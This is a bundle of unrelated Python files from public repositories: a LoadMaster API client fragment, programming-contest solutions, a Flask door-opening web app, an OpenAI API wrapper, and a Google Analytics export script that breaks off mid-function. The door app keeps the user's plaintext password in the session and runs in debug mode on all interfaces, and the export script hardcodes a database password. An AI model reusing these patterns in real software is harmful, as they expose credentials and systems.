= self.build_cluster(cluster_data)\n return cluster\n\n def build_cluster(self, cluster):\n \"\"\"Create a Cluster instance with standard defaults\"\"\"\n cluster_object = Cluster(self.access_info,\n cluster.get('IPAddress'),\n cluster.get('Name'))\n cluster_object.populate_default_attributes(cluster)\n return cluster_object\n\n def create_range(self, ip, mask):\n \"\"\"Range factory with pre-configured LoadMaster connection.\"\"\"\n iprange = Range(self.access_info, ip, mask)\n return iprange\n\n def get_ranges(self):\n try:\n response = self._get(\"/listips\")\n data = get_data(response)\n ranges = data.get('IPAddress', [])\n except KempTechApiException:\n ranges = []\n\n range_list = []\n ranges = cast_to_list(ranges)\n for r in ranges:\n range = self.build_range(r)\n range_list.append(range)\n return range_list\n\n def get_range(self, ip):\n service_id = {\"ipaddress\": ip}\n response = self._get(\"/showip\", service_id)\n data = get_data(response)\n # again line below will fail with ValidationError if empty response\n range_data = data.get('cluster', {})\n if not isinstance(range_data, dict):\n raise LoadMasterParameterError(\n \"Unexepected number of ranges returned\", range_data)\n return self.build_range(range_data)\n\n def build_range(self, range):\n \"\"\"Create a Range instance with standard defaults\"\"\"\n range_object = Range(self.access_info,\n range.get('IPAddress'),\n range.get('Mask'))\n range_object.populate_default_attributes(range)\n return range_object\n\n def create_customlocation(self, name):\n \"\"\"CustomLocation factory with pre-configured LoadMaster connection.\"\"\"\n return CustomLocation(self.access_info, name)\n\n def get_customlocations(self):\n try:\n response = self._get(\"/listcustomlocation\")\n data = get_data(response)\n customlocations = data.get('location', [])\n except KempTechApiException:\n customlocations = []\n\n customlocation_list = []\n customlocations = cast_to_list(customlocations)\n for c in customlocations:\n customlocation = self.build_customlocation(c)\n customlocation_list.append(customlocation)\n return customlocation_list\n\n def get_customlocation(self, name):\n service_id = {\"name\": name}\n response = self._get(\"/listcustomlocation\", service_id)\n data = get_data(response)\n # again line below will fail with ValidationError if empty response\n 
customlocations_data = data.get('location', {})\n\n customlocation_data = [x for x in customlocations_data\n if x['Name'] == name]\n\n if not isinstance(customlocation_data, dict):\n raise LoadMasterParameterError(\n \"Unexepected number of custom locations returned\",\n customlocation_data)\n customlocation = self.build_range(customlocation_data)\n return customlocation\n\n def build_customlocation(self, customlocation):\n \"\"\"Create a Range instance with standard defaults\"\"\"\n customlocation_object = CustomLocation(\n self.access_info,\n customlocation.get('Name'))\n return customlocation_object\n\n\nclass LoadMaster(BaseKempAppliance):\n \"\"\"LoadMaster API object.\"\"\"\n\n @property\n def vs(self):\n return {int(vs.index): vs for vs in self.get_virtual_services()}\n\n @property\n def rules(self):\n return {rule.name: rule for rule in self.get_rules()}\n\n @property\n def sso(self):\n return {sso.name: sso for sso in self.get_ssos()}\n\n @property\n def templates(self):\n return {template.name: template for template in self.get_templates()}\n\n @property\n def certificates(self):\n return {certificate.certname: certificate for certificate in\n self.get_certificates()}\n\n def get_adaptive_parameters(self):\n response = self._get(\"/showadaptive\")\n data = get_data(response)\n\n return data['Data']\n\n def set_adaptive_parameters(self,\n adaptiveurl=None,\n adaptiveport=None,\n adaptiveinterval=None,\n minpercent=None):\n parameters = {}\n\n if adaptiveurl is not None:\n parameters['AdaptiveURL'] = adaptiveurl\n if adaptiveport is not None:\n validate_port(adaptiveport)\n parameters['AdaptivePort'] = adaptiveport\n if adaptiveinterval is not None:\n try:\n parameters['AdaptiveInterval'] = int(adaptiveinterval)\n except ValueError:\n raise LoadMasterParameterError(\n \"AdaptiveInterval specified is not an integer\",\n adaptiveinterval)\n if minpercent is not None:\n try:\n parameters['MinPercent'] = int(minpercent)\n except ValueError:\n raise LoadMasterParameterError(\n \"MinPercent specified is not an integer\",\n minpercent)\n\n response = self._get(\"/modadaptive\", parameters)\n\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n def get_check_parameters(self):\n response = self._get(\"/showhealth\")\n data = get_data(response)\n formatted = {}\n\n for k, v in data.items():\n formatted[k.lower()] = int(v)\n\n return formatted\n\n def set_check_parameters(self,\n retryinterval=None,\n timeout=None,\n retrycount=None):\n parameters = {}\n if timeout is not None:\n try:\n parameters['Timeout'] = int(timeout)\n except ValueError:\n raise LoadMasterParameterError(\n \"Timeout specified is not an integer\",\n timeout)\n if retrycount is not None:\n try:\n parameters['RetryCount'] = int(retrycount)\n except ValueError:\n raise LoadMasterParameterError(\n \"RetryCount specified is not an integer\",\n retrycount)\n if retryinterval is not None:\n try:\n parameters['RetryInterval'] = int(retryinterval)\n except ValueError:\n raise LoadMasterParameterError(\n \"RetryInterval specified is not an integer\",\n retryinterval)\n\n response = self._get(\"/modhealth\", parameters)\n\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n def create_sso(self, name):\n return Sso(self.access_info, name)\n\n def get_ssos(self):\n response = self._get(\"/showdomain\")\n ssos = get_data(response).get(\"Domain\") or []\n ssos_list = []\n\n # if there is no Rule key, build_virtual_services will fail with a\n # ValidationError, 
which is the best we can do for now\n # (without changing the upstream code and raising an exception earlier,\n # possibly retrying)\n if not isinstance(ssos, list):\n ssos = [ssos]\n for sso in ssos:\n sso_object = self.build_sso(sso)\n ssos_list.append(sso_object)\n return ssos_list\n\n def get_sso(self, name):\n service_id = {\"name\": name}\n response = self._get(\"/showdomain\", service_id)\n sso = get_data(response).get(\"Domain\")\n\n # again line below will fail with ValidationError if empty response\n sso_object = self.build_sso(sso)\n return sso_object\n\n def build_sso(self, sso):\n \"\"\"Create a Rule instance with standard defaults\"\"\"\n sso_object = Sso(self.access_info, sso.get('Name'))\n\n sso_object.populate_default_attributes(sso)\n return sso_object\n\n def create_rule(self, name, pattern):\n return Rule(self.access_info, name, pattern)\n\n def get_rules(self):\n response = self._get(\"/showrule\")\n data = get_data(response)\n rules_list = []\n\n for rule_type, rules in data.items():\n rules = cast_to_list(rules)\n for rule in rules:\n rule['type'] = rule_type\n rule_object = build_object(Rule, self.access_info, rule)\n rules_list.append(rule_object)\n\n return rules_list\n\n def get_rule(self, name):\n response = self._get(\"/showrule\", {\"name\": name})\n data = get_data(response)\n rules_list = []\n rule_object = None\n\n if len(data) > 1:\n raise KempTechApiException(\"Too many rules returned\")\n\n for rule_type, rules in data.items():\n rules = cast_to_list(rules)\n\n for rule in rules:\n rule['type'] = rule_type\n rule_object = build_object(Rule, self.access_info, rule)\n rules_list.append(rule_object)\n\n return rule_object\n\n def create_cipherset(self, cipherset_name, ciphers):\n cipherset = CipherSet(self.access_info, cipherset_name, ciphers)\n cipherset.save()\n\n def create_certificate(self, certificate, certfile, certpass=None):\n \"\"\"Certificate factory with pre-configured LoadMaster connection.\"\"\"\n cert = Certificate(self.access_info,\n certificate,\n certfile=certfile,\n certpass=certpass)\n return cert\n\n def create_intermediate_certificate(self, certificate, certfile):\n \"\"\"Certificate factory with pre-configured LoadMaster connection.\"\"\"\n cert = IntermediateCertificate(self.access_info,\n certificate,\n certfile=certfile)\n return cert\n\n def get_certificates(self, type='cert'):\n response = self._get(\"/listcert\")\n data = get_data(response)\n certificates = []\n certs = data.get('cert', [])\n if not isinstance(certs, list):\n certs = [certs]\n for cert in certs:\n certificate = self.build_certificate(cert)\n certificates.append(certificate)\n return certificates\n\n def get_intermediate_certificates(self, type='cert'):\n response = self._get(\"/listintermediate\")\n data = get_data(response)\n certificates = []\n certs = data.get('cert', [])\n if not isinstance(certs, list):\n certs = [certs]\n for cert in certs:\n certificate = self.build_intermediate_certificate(cert)\n certificates.append(certificate)\n return certificates\n\n def build_certificate(self, certificate, certfile=None,\n certpass=None):\n \"\"\"Create a Certificte instance named certificate\"\"\"\n if certfile is not None:\n cert = Certificate(self.access_info, certificate,\n certfile=certfile, certpass=certpass)\n else:\n cert = Certificate(self.access_info, certificate)\n return cert\n\n def build_intermediate_certificate(self, certificate, certfile=None):\n \"\"\"Create a Certificte instance named certificate\"\"\"\n if certfile is not None:\n cert = 
IntermediateCertificate(self.access_info,\n certificate,\n certfile=certfile)\n else:\n cert = IntermediateCertificate(self.access_info, certificate)\n return cert\n\n def create_virtual_service(self, ip, port=80, protocol=\"tcp\"):\n return VirtualService(self.access_info, ip, port, protocol)\n\n def get_virtual_services(self):\n response = self._get(\"/listvs\")\n data = get_data(response)\n virtual_services = []\n services = data.get('VS', [])\n services = cast_to_list(services)\n for service in services:\n master_vs_id = int(service.get('MasterVSID', 0))\n if master_vs_id != 0:\n for vs in services:\n if int(vs.get(\"Index\", 0)) == master_vs_id:\n virt_serv = self.build_virtual_service(service, vs)\n else:\n virt_serv = self.build_virtual_service(service, response)\n virtual_services.append(virt_serv)\n return virtual_services\n\n def get_virtual_service(self, index=None, address=None, port=None,\n protocol=None):\n if index is None:\n validate_ip(address)\n validate_port(port)\n validate_protocol(protocol)\n service_id = {\"vs\": address, \"port\": port, \"prot\": protocol}\n else:\n service_id = {\"vs\": index}\n response = self._get(\"/showvs\", service_id)\n service = get_data(response)\n # again line below will fail with ValidationError if empty response\n virt_serv = self.build_virtual_service(service)\n return virt_serv\n\n def build_virtual_service(self, service, response=None):\n \"\"\"Create a VirtualService instance with populated with API parameters\n\n This does not include potentially attached real servers\n :param service: OrderedDict populated with virtual service data\n :param response: Optional response of a listvs call. This acts as a\n cache, if you want to create a lot of VirtualService\n objects in a row, such as with looping, you can call\n listvs and pass the response in each time and this\n will nullify the extra listvs calls.\n :return: VirtualService object with populated attributes\n \"\"\"\n is_sub_vs = True if int(service.get('MasterVSID', 0)) != 0 else False\n if is_sub_vs:\n # `response` needs to be a dict in here\n # Add lb properties to the sub vs\n if response is None:\n response = self._get(\"/showvs\",\n {\"vs\": service.get('MasterVSID')})\n parent_vs_data = get_data(response)\n else:\n parent_vs_data = response\n subvs_lb_props = get_sub_vs_list_from_data(parent_vs_data)[1]\n virt_serv = VirtualService(self.access_info, service.get('Index'),\n is_sub_vs=True)\n virt_serv.subvs_data = subvs_lb_props[service.get('Index')]\n virt_serv.subvs_data['parentvs'] = service.get('MasterVSID')\n else:\n # `response` needs to be a raw xml output here\n # Add any sub VSs to the top level VS\n if response is None:\n response = self._get(\"/listvs\")\n data = get_data(response)\n virt_serv = VirtualService(self.access_info,\n service.get('VSAddress'),\n service.get('VSPort'),\n service.get('Protocol'),\n is_sub_vs=False)\n virt_serv.subvs_entries = []\n services = get_dict_entry_as_list(\"VS\", data)\n this_vs_index = service.get('Index')\n for vs in services:\n # add subvs to parent vs\n if vs['MasterVSID'] == this_vs_index:\n subvs = VirtualService(self.access_info, vs['Index'],\n is_sub_vs=True)\n subvs.populate_default_attributes(vs)\n subvs_api_entries = service.get(\"SubVS\", [])\n subvs_api_entries = cast_to_list(subvs_api_entries)\n for subvs_api in subvs_api_entries:\n # add the \"Rs\" part of the subvs to the subvs instance\n if subvs_api[\"VSIndex\"] == subvs.index:\n subvs.subvs_data = subvs_api\n # Have to add a parentvs hook to make life easy\n 
subvs.subvs_data['parentvs'] = this_vs_index\n virt_serv.subvs_entries.append(subvs)\n virt_serv.populate_default_attributes(service)\n return virt_serv\n\n def get_all_objects(self):\n # x variables are the object while x_data is the OrderedDict\n virtual_services = []\n response = self._get(\"/listvs\")\n data = get_data(response)\n virtual_services_data = data.get('VS', [])\n virtual_services_data = cast_to_list(virtual_services_data)\n\n # create vs and rs objects at this point\n # loop through all vss and attach matching real server objects\n for service_data in virtual_services_data:\n master_vs_id = int(service_data.get('MasterVSID', 0))\n if master_vs_id != 0:\n for vs in virtual_services_data:\n if int(vs.get(\"Index\", 0)) == master_vs_id:\n virt_serv = self.build_virtual_service(service_data,\n vs)\n else:\n virt_serv = self.build_virtual_service(service_data, response)\n real_servers = cast_to_list(service_data.get(\"Rs\", []))\n for server_data in real_servers:\n rs = virt_serv.build_real_server(server_data)\n virt_serv.real_servers.append(rs)\n virtual_services.append(virt_serv)\n # replace subvs's with vs's that have RSs in them.\n for vs in virtual_services:\n for subvs in vs.subvs_entries:\n for top_level_vs in virtual_services:\n if subvs.index == top_level_vs.index:\n subvs.real_servers = top_level_vs.real_servers\n\n return virtual_services\n\n def clone_virtual_service(self, service, ip=None, port=None, protocol=None,\n enable=True,\n dry_run=False):\n \"\"\"Given a VirtualService instance, add it to this LoadMaster\n\n :param service: The VirtualService instance to clone\n :param ip: The new IP address of the virtual service\n :param port: The new port of the virtual service\n :param protocol: The new protocol of the virtual service\n :param enable: Enable the VirtualService\n :param dry_run: Don't save the VirtualSerivce immediately\n :return: The altered VirtualService tied to the this LoadMaster\n \"\"\"\n if not isinstance(service, VirtualService):\n raise NotVirtualServiceInstanceError()\n\n service.endpoint = self.endpoint\n service.ip_address = self.ip_address\n service.cert = self.cert\n\n service.index = None\n service.vs = ip or service.vs\n service.port = port or service.port\n service.prot = protocol or service.prot\n\n service.enable = get_api_bool_string(enable)\n\n if not dry_run:\n service.save()\n\n return service\n\n def upload_template(self, file):\n # Deprecated, use create_template\n response = self._post('/uploadtemplate', file)\n return send_response(response)\n\n def create_template(self, file):\n existing = self.templates.keys()\n\n self._post(\"/uploadtemplate\", file)\n\n uploaded_templates = {k: v for k, v in self.templates.items()\n if k not in existing}\n\n return uploaded_templates\n\n def get_templates(self):\n response = self._get(\"/listtemplates\")\n data = get_data(response)\n return list_object(Template, self.access_info, data)\n\n def get_template(self, name):\n # There is not 'get' for templates, only list.\n templates = self.get_templates()\n for template in templates:\n if template.name == name:\n return template\n\n def list_templates(self):\n # Backward compatability\n return self.get_templates()\n\n def delete_template(self, template_name):\n params = {'name': template_name}\n response = self._get('/deltemplate', parameters=params)\n return send_response(response)\n\n def apply_template(self, virtual_ip, port, protocol, template_name,\n nickname=None):\n params = {\n 'vs': virtual_ip,\n 'port': port,\n 'prot': protocol,\n 
'name': template_name,\n }\n\n existing = self.vs.keys()\n\n if nickname is not None:\n params['nickname'] = nickname\n\n response = self._get(\"/addvs\", parameters=params)\n\n if is_successful(response):\n vs = {k: v for k, v in self.vs.items()\n if k not in existing}\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return vs\n\n def get_sdn_controller(self):\n response = self._get('/getsdncontroller')\n return send_response(response)\n\n def get_sdn_info(self):\n response = self._get('/sdninfo')\n return send_response(response)\n\n\nclass LoadMasterGeo(LoadMaster, Geo):\n pass\n","repo_name":"dgquaid/python-kemptech-api","sub_path":"python_kemptech_api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":50967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74864584092","text":"def _read_input():\n with open(\"input.txt\", mode='r') as f:\n data = f.read().splitlines()\n\n # Получение чисел\n n = int(data[0])\n numbers = [int(i) for i in data[1].split()]\n\n return n, numbers\n\n\ndef _is_unique(numbers: list):\n \"\"\"\n Проверка на уникальность всех чисел.\n\n :param numbers: Числа.\n :return: True/False\n \"\"\"\n min_num = min(numbers)\n max_num = max(numbers)\n if min_num != max_num:\n return True, min_num, max_num\n return False, min_num, max_num\n\n\ndef _downgrading_large_numbers(n: int, numbers: list, min_num: int):\n \"\"\"\n Понижение больших чисел до >= текущему min значению.\n\n :param numbers: Числа.\n :return: Новые числа, количество операций.\n \"\"\"\n operation_count = 0\n for i in range(n):\n if numbers[i] >= 2 * min_num:\n del_op = numbers[i] // min_num - 1\n operation_count += del_op\n numbers[i] -= del_op * min_num\n\n return numbers, operation_count\n\n\ndef _change_min(numbers: list, min_num: int, max_num: int):\n \"\"\"\n Понизить минимальное значение посредством вычитания max - min.\n\n :param numbers: Числа.\n :return: Новые числа, количество операций.\n \"\"\"\n max_ind = numbers.index(max_num)\n numbers[max_ind] -= min_num\n op_count = 1\n return numbers, op_count\n\n\ndef _do_operation(n, numbers: list, operations: int):\n \"\"\"\n Алгоритм.\n\n :param numbers: Числа.\n :return: None.\n \"\"\"\n while True:\n is_unique, min_num, max_num = _is_unique(numbers)\n if not is_unique:\n break\n\n if max_num < 2 * min_num:\n # Если не кратные, не одинаковые и нет чисел >= 2 * min\n # Понижаем минимальное значение посредством вычитания max - min\n # (2N + 3N)\n numbers, op_count = _change_min(numbers, min_num, max_num)\n operations += op_count\n else:\n # Если не кратные и не одинако��ые...\n # Для чисел, которые больше min считаем количество операций,\n # пока они не будут менять min...\n # (2N)\n numbers, op_count = _downgrading_large_numbers(n, numbers, min_num)\n operations += op_count\n\n # Вывод количества операций\n print(operations)\n\n\ndef main():\n operation_count = 0\n n, numbers = _read_input()\n _do_operation(n, numbers, operation_count)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nmikolaychuk/yandex-contest-2017-var-3","sub_path":"task_f.py","file_name":"task_f.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30067136657","text":"\"\"\"\r\n\n\n **Mubashir** needs your help to filter out **Simple Numbers** from a given\nlist.\n\n### Simple Numbers\n\n 89 = 8^1 + 9^2\n 135 = 1^1 + 3^2 + 5^3\n\nCreate a function to collect these numbers 
from a given range between `a` and\n`b` (both numbers are inclusive).\n\n### Examples\n\n simple_numbers(1, 10) ➞ [1, 2, 3, 4, 5, 6, 7, 8, 9]\n \n simple_numbers(1, 100) ➞ [1, 2, 3, 4, 5, 6, 7, 8, 9, 89]\n \n simple_numbers(90, 100) ➞ []\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef simple_numbers(a, b):\n # 135 = 1^1 + 3^2 + 5^3\n L = [];\n for i in range(a,b+1):\n if isSimpleNumber(i):\n L.append(i);\n return L;\n \ndef isSimpleNumber(n):\n C = 0;\n for i in range(1,len(str(n))+1):\n #print(i,C,str(n)[i-1])\n C+= int(str(n)[i-1])** i;\n return C == n\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"FqFGnnffKRo8LKQKP_19.py","file_name":"FqFGnnffKRo8LKQKP_19.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72877436251","text":"#!/usr/bin/python2 -u\n\nimport logging\nimport random\nimport sys\nfrom datetime import datetime, timedelta\n\nfrom flask import Flask, Response, render_template, session, request, redirect, url_for\n\nimport acme\nimport config\nimport door_lib\nimport ldap_user.config as ldap_config\nfrom ldap_user.flipdotuser import FlipdotUser\nfrom ldap_user.webapp import FrontendError\n\nlogging.basicConfig(\n level=logging.DEBUG if config.DEBUG else logging.INFO,\n format=\"[%(levelname)s][%(name)s] %(message)s\")\nlog = logging.getLogger(\"web\")\n\napp = Flask(__name__, )\n\n@app.route('/')\ndef index():\n if 'uid' not in session:\n return render_template('login.html')\n else:\n open, open_raw = is_door_open()\n dn, user = FlipdotUser().getuser(session['uid'])\n return render_template('door.html',\n state=\"Open\" if open else \"Closed\",\n state_raw=open_raw, user=user)\n\n@app.route('/manifest.json')\ndef manifest():\n with open('templates/manifest.json') as f:\n data = f.read()\n return Response(data, mimetype='application/json')\n\n@app.route('/login', methods=['POST'])\ndef login():\n if request.method == 'POST':\n uid = request.form.get('uid', '')\n pwd = request.form.get('password', '')\n if not uid or not pwd:\n return redirect(\"/\", 302)\n try:\n ldap = FlipdotUser()\n valid, dn = ldap.login(uid, pwd)\n except FrontendError as e:\n return render_template(\"error.html\", message=e.message)\n if valid:\n session['uid'] = dn\n session['user'] = uid\n session['pass'] = pwd\n else:\n session.pop('uid', None)\n return redirect('/')\n else:\n return redirect('/')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for('index'))\n\n@app.route('/door', methods=['POST'])\ndef door():\n if request.form.get('action', 'closedoor') == 'opendoor':\n\n if 'uid' not in session:\n return render_template('login.html')\n dn, user = FlipdotUser().getuser(session['uid'])\n if 'is_member' not in user['meta'] or not user['meta']['is_member']:\n return render_template(\"error.html\",\n message=\"You are not allowed to open the door.\")\n\n log.info(\"Opening door.\")\n door_lib.open()\n else:\n log.info(\"Closing door.\")\n door_lib.close()\n global door_time\n door_time = None\n return redirect(url_for('index'))\n\ncache_time = timedelta(seconds=10)\ndoor_time = None\ndoor_open = None\ndef is_door_open():\n if hasattr(config, 'fake_door') and config.fake_door:\n return (random.random() > 0.5, random.randint(1,999))\n global door_open, door_time\n if door_open and door_time and door_time + cache_time > datetime.utcnow():\n return door_open\n\n with door_lib.get_serial() as s:\n door_open = door_lib.get_state(s)\n door_time = datetime.utcnow()\n return 
door_open\n\nif __name__ == '__main__':\n log.info(\"argv: %s\", sys.argv)\n #tls = acme.ACME(app, staging=config.STAGING)\n app.secret_key = ldap_config.SECRET\n app.run(host=\"0.0.0.0\", port=config.PORT, debug=True,\n threaded=True, processes=0,\n use_reloader=False)\n #tls.stop()\n #tls.thread.join()\n\n","repo_name":"flipdot/door","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"42946776132","text":"\"\"\"Day 7: No Space Left On Device\n\nhttps://adventofcode.com/2022/day/7\n\n\"\"\"\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass AocData:\n name: str\n size: int | None = None\n children: dict | None = None\n parent: AocData | None = None\n\n @property\n def is_dir(self):\n return not self.size or self.children\n\n def __repr__(self):\n return (\n f'<{\"Dir\" if self.is_dir else \"File\"}: {self.name} | {self.size}>'\n )\n\n\ndef handle_cd(command, current_dir, root):\n \"\"\"No adding new roots\"\"\"\n destination = command.split()[1]\n if destination == '/':\n return root\n elif destination == '..':\n return current_dir.parent\n else:\n return current_dir.children[destination]\n\n\ndef handle_ls(command, current_dir, all_nodes):\n if current_dir.children is None:\n current_dir.children = {}\n children = command.split('\\n')[1:]\n for ch in children:\n ch_type, name = ch.split()\n new_node = AocData(name=name, parent=current_dir)\n if ch_type == 'dir':\n new_node.children = {}\n if ch_type.isdigit():\n new_node.size = int(ch_type)\n current_dir.children[name] = new_node\n\n if new_node.is_dir:\n all_nodes.append(new_node)\n\n\ndef parse(data):\n root = AocData(name='.', children={})\n current_dir = root\n all_nodes = [root]\n\n data = data.strip()\n for command in data.split('$ '):\n command = command.strip()\n if command.startswith('cd'):\n current_dir = handle_cd(command, current_dir, root)\n elif command.startswith('ls'):\n handle_ls(command, current_dir, all_nodes)\n return root, all_nodes\n\n\ndef calculate_size(node):\n if node.size:\n return node.size\n ch_size = 0\n for ch in node.children.values():\n if ch.is_dir and not ch.size:\n ch_size += calculate_size(ch)\n else:\n ch_size += ch.size\n node.size = ch_size\n return node.size\n\n\ndef traverse(node):\n for n in node.children.values():\n if n.is_dir:\n for subn in traverse(n):\n yield subn\n yield node\n\n\ndef solve(data):\n root, all_nodes = parse(data)\n calculate_size(root)\n return sum([n.size for n in traverse(root) if n.size <= 100000])\n\n\ndef solve2(data):\n root, all_nodes = parse(data)\n calculate_size(root)\n space_needed = 30000000 - (70000000 - root.size)\n return min([n.size for n in traverse(root) if n.size >= space_needed])\n\n\nif __name__ == '__main__':\n input_data = open('input_data.txt').read()\n\n result = solve(input_data)\n print(f'Example1: {result}')\n\n result = solve2(input_data)\n print(f'Example2: {result}')\n","repo_name":"lenarother/advent-of-code","sub_path":"adventofcode_2022/day_07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1842389760","text":"import openai\nimport sys\nfrom config.config import OPENAI_KEY\n\nclass chatgpt_():\n\n def __init__(self,apitype=\"\",dict_args_input={}):\n \n self.dict_args={\n \"model\":\"text-davinci-003\",\n 
\"temperature\":0.9,\n \"max_tokens\":550,\n \"top_p\":1,\n \"frequency_penalty\":0.0,\n \"presence_penalty\":0.6,\n }\n # if apitype in (\"\"):\n # pass\n for k,v in dict_args_input:\n self.dict_args[k]=v\n\n def chat(self,mess):\n isok,response=self.openapi_(mess)\n \n if isok:\n sb_mess=[]\n for c in response.choices:\n if len(c.text)>1:\n sb_mess.append(c.text)\n return isok,\"\".join(sb_mess)\n else:\n return isok,\"error:{response}\"\n\n def openapi_(self,mess):\n openai.api_key = OPENAI_KEY\n try :\n response = openai.Completion.create(\n model=self.dict_args[\"model\"],\n prompt=str(mess),\n temperature=self.dict_args[\"temperature\"],\n max_tokens=self.dict_args[\"max_tokens\"],\n top_p=self.dict_args[\"top_p\"],\n frequency_penalty=self.dict_args[\"frequency_penalty\"],\n presence_penalty=self.dict_args[\"presence_penalty\"],\n #stop=[\" Human:\", \" AI:\"]\n )\n return True,response\n except Exception as ex:\n return False,str(ex)\n \n\n\n\nif __name__ == '__main__':\n if(len(sys.argv)>1):\n isok,responsestr=chatgpt_().chat(sys.argv[1])\n print(responsestr)","repo_name":"51ak/ChatGPT_Weixin","sub_path":"chatgpt/chatgpt_.py","file_name":"chatgpt_.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"26280152060","text":"\"\"\"Falling Apples\"\"\"\n\n# apples\n\nfrom sys import stdin, stdout\n\nrows, columns = map(int, stdin.readline().split())\nboard = []\ncurrent = {}\n\nfor i in range(rows):\n board.append(list(stdin.readline().rstrip()))\n\nfor i in range(columns):\n current[i] = rows - 1\n\nfor i in range(rows - 1, -1, -1):\n for j in range(columns):\n if board[i][j] == \"a\":\n board[i][j] = \".\"\n board[current[j]][j] = \"a\"\n current[j] -= 1\n elif board[i][j] == \"#\":\n current[j] = i - 1\n\nfor i in range(rows):\n stdout.write(\"\".join(board[i]) + \"\\n\")\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"A/apples.py","file_name":"apples.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34568098456","text":"\ndef intersectie(semiplane, Q):\n maximX, maximY = 9999999999, 9999999999\n minimX, minimY = -9999999999, -9999999999\n\n for semiplan in semiplane:\n # verificare semiplan vertical\n if semiplan[0] == 0:\n # vedem in ce parte a semiplanului se afla Q\n if (semiplan[2] + semiplan[1] * Q[1]) >= 0: # ecuatia dreptei care defineste semiplanul in functie de Qy\n continue # se afla in partea gresita\n else:\n if (semiplan[2] + semiplan[0] * Q[0]) >= 0: # semiplanul in functie de Qx\n continue\n\n if semiplan[0] == 0:\n # coordonata y a punctului de intersecție al semiplanei cu axa y.\n if -1 * semiplan[2] / semiplan[1] < Q[1]:\n # intersectia se afla deasupra deasupra lui Q\n minimY = max(minimY, -1 * semiplan[2] / semiplan[1])\n else:\n maximY = min(maximY, -1 * semiplan[2] / semiplan[1])\n else:\n if -1 * semiplan[2] / semiplan[0] < Q[0]:\n minimX = max(minimX, -1 * semiplan[2] / semiplan[0])\n else:\n maximX = min(maximX, -1 * semiplan[2] / semiplan[0])\n\n if max(maximX, maximY) == 9999999999 or min(minimX, minimY) == -9999999999:\n return 0 # nu exista dreptunghiuri\n return (maximX - minimX) * (maximY - minimY) # calculez valoarea ariilor\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # citire date\n n = int(input())\n semiplane = []\n for i in range(n):\n line = input().split()\n semiplan = 
(float(line[0]), float(line[1]), float(line[2]))\n semiplane.append(semiplan)\n\n m = int(input())\n for i in range(m):\n linie = input().split()\n result = intersectie(semiplane, (float(linie[0]), float(linie[1])))\n if result == 0:\n print(\"NO\")\n else:\n print(\"YES\")\n print(result)\n","repo_name":"Ruxi12/An-2","sub_path":"Semestrul 2/AA/Tema3/Punct_fata_de_intersectii_de_semiplane.py","file_name":"Punct_fata_de_intersectii_de_semiplane.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14886476735","text":"import csv\nimport psycopg2\nfrom google.analytics.data_v1beta import BetaAnalyticsDataClient\nfrom google.analytics.data_v1beta.types import (\n DateRange,\n Dimension,\n Metric,\n RunReportRequest,\n)\nimport os\n\nDIR_PATH = os.path.abspath(os.path.dirname(__file__))\nfolder_name = \"\\_Output\"\nfilename = \"analytics_report.csv\"\npath = os.path.join(DIR_PATH, folder_name)\ntry:\n os.mkdir(path)\nexcept OSError as error:\n print(error)\n\nproperty_id = \"353814524\"\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"C:/Users/user3/Downloads/automation-25cff4119eb3.json\"\n\ndef format_date(date_str):\n year = date_str[:4]\n month = date_str[4:6]\n day = date_str[6:8]\n hour = date_str[8:10]\n return f\"{year}-{month.zfill(2)}-{day.zfill(2)} {hour}:00:00\"\n\ndef sample_run_report(property_id):\n client = BetaAnalyticsDataClient()\n\n request = RunReportRequest(\n property=f\"properties/{property_id}\",\n dimensions=[Dimension(name=\"dateHour\")],\n metrics=[\n Metric(name=\"sessions\"),\n Metric(name=\"screenPageViews\"),\n Metric(name=\"eventCount\"),\n Metric(name=\"userEngagementDuration\"),\n ],\n date_ranges=[DateRange(start_date=\"2022-06-01\", end_date=\"today\")],\n )\n response = client.run_report(request)\n\n csv_filename = os.path.join(path, filename)\n\n print(\"Report result:\")\n with open(csv_filename, mode=\"w\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerow([\"Date\", \"Sessions\", \"Screen Pageviews\", \"Event Count\", \"User Engagement Duration\"])\n\n for row in response.rows:\n date = format_date(row.dimension_values[0].value)\n sessions = row.metric_values[0].value\n screen_pageviews = row.metric_values[1].value\n event_count = row.metric_values[2].value\n user_engagement_duration = row.metric_values[3].value\n\n writer.writerow([date, sessions, screen_pageviews, event_count, user_engagement_duration])\n\n print(f\"Data has been saved to {csv_filename}\")\n\ndef table(filename):\n conn = psycopg2.connect(host='localhost', dbname='postgres', user='postgres', password='1234', port=5432)\n cur = conn.cursor()\n path = os.path.join(DIR_PATH, folder_name, filename)\n\n # Create table\n 